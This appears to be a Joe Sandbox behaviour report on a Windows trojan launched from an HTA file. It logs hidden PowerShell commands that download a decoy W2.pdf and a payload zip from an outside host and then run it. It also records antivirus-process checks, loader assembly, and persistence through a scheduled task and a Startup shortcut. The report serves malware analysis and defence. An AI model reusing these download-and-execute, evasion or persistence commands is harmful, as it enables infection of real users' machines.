Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F1FE7	38_2_005F1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 00B4FD52 appears 40 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 005F0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 00B50DA0 appears 46 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 005EFD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062CF appears 57 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winHTA@68/101@0/2

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BA41FA GetLastError,FormatMessageW,

36_2_00BA41FA

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B92010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	36_2_00B92010
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B91A0B AdjustTokenPrivileges,CloseHandle,	36_2_00B91A0B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00632010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	38_2_00632010
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00631A0B AdjustTokenPrivileges,CloseHandle,	38_2_00631A0B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

15_2_004044D1

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B9DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

36_2_00B9DD87

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004024FB CoCreateInstance,

15_2_004024FB

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BA3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

36_2_00BA3A0E

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8904:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\temp.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1632,i,1275163291349414999,11919698709782413432,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1632,i,1275163291349414999,11919698709782413432,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
